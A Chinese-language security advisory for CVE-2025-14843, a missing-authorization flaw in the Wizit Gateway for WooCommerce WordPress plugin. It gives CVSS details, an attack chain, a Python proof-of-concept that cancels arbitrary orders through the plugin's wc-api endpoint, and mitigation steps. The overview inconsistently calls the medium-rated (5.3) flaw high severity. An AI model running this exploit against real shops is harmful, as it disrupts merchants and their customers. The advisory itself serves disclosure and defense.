CVE-2025-14843 WordPress Wizit插件未授权任意订单取消漏洞

漏洞信息

漏洞编号

CVE-2025-14843

漏洞类型

未授权访问/业务逻辑漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wizit Gateway for WooCommerce (WordPress插件)

漏洞概述

CVE-2025-14843是WordPress平台Wizit Gateway for WooCommerce插件中的一个高危安全漏洞。该漏洞存在于所有1.2.9及以下版本中，由于插件的handle_checkout_redirecturl_response函数缺少适当的身份验证和授权检查机制，导致未经身份验证的远程攻击者可以取消任意WooCommerce订单。此漏洞影响使用该插件进行支付处理的WordPress电商网站，攻击者无需任何用户凭证即可通过发送带有有效订单ID的伪造请求来恶意取消合法订单，可能导致业务中断、用户不满以及潜在的财务损失。由于CVSS评分为5.3（中等严重程度），该漏洞通过网络即可利用，无需特殊权限或用户交互，但造成的机密性和完整性影响相对较低。

技术细节

该漏洞的根本原因在于Wizit Gateway for WooCommerce插件的handle_checkout_redirecturl_response函数未对用户请求进行身份验证和授权验证。攻击者可以利用这一点，通过构造特定的HTTP请求来触发订单取消功能。具体来说，攻击者需要向插件的回调URL端点发送请求，并在请求中包含目标订单的有效ID。由于函数缺少对当前用户是否拥有该订单所有权或是否有权操作该订单的检查，攻击者可以在未登录或未授权的情况下成功取消任意订单。这种业务逻辑漏洞属于IDOR（不安全直接对象引用）的一种变体，攻击者通过猜测或枚举有效的订单ID来实施攻击。CVSS向量显示攻击向量为网络层面（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），对机密性影响低（C:L），对完整性影响低（I:L），对可用性无影响（A:N）。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站，发现其使用Wizit Gateway for WooCommerce插件（版本<=1.2.9）

STEP 2

步骤2

攻击者获取有效的WooCommerce订单ID（可通过订单号枚举、API探测或日志分析等方式）

STEP 3

步骤3

攻击者构造恶意HTTP请求，访问插件的wc-api/wc_wizit_gateway端点，包含目标订单ID和取消参数

STEP 4

步骤4

由于插件缺少身份验证和授权检查，请求被服务器处理，触发handle_checkout_redirecturl_response函数

STEP 5

步骤5

目标订单被成功取消，攻击者无需任何认证凭证即可完成操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14843 PoC - Unauthenticated Arbitrary Order Cancellation
# Target: Wizit Gateway for WooCommerce plugin <= 1.2.9

def cancel_order(target_url, order_id):
    """
    Exploit function to cancel arbitrary WooCommerce orders
    without authentication via Wizit Gateway plugin vulnerability.
    
    Args:
        target_url: Base URL of the vulnerable WordPress site
        order_id: Valid WooCommerce order ID to cancel
    
    Returns:
        Response from the server
    """
    # Construct the vulnerable endpoint
    # The handle_checkout_redirecturl_response function processes this request
    exploit_url = f"{target_url}/?wc-api=wc_wizit_gateway"
    
    # Parameters that trigger the order cancellation
    params = {
        'order_id': order_id,
        'redirect_url': 'cancel'  # Trigger cancellation flow
    }
    
    # Send crafted request without authentication
    response = requests.get(exploit_url, params=params, timeout=10)
    
    return response

# Example usage
if __name__ == '__main__':
    target = 'https://vulnerable-site.com'
    target_order_id = 12345  # Replace with valid order ID
    
    try:
        result = cancel_order(target, target_order_id)
        print(f'Status Code: {result.status_code}')
        print(f'Response: {result.text[:500]}')
    except Exception as e:
        print(f'Error: {e}')

影响范围

Wizit Gateway for WooCommerce <= 1.2.9

防御指南

临时缓解措施

如果无法立即更新插件，可以采取以下临时缓解措施：1) 暂时禁用Wizit Gateway插件，改用其他支付网关；2) 通过Web应用防火墙添加规则，限制对wc-api端点的访问频率；3) 监控WooCommerce订单状态变更日志，及时发现异常取消行为；4) 限制订单取消功能的访问来源IP；5) 联系WordPress安全社区获取临时补丁。但这些措施仅为临时解决方案，最终仍需升级到插件的最新安全版本。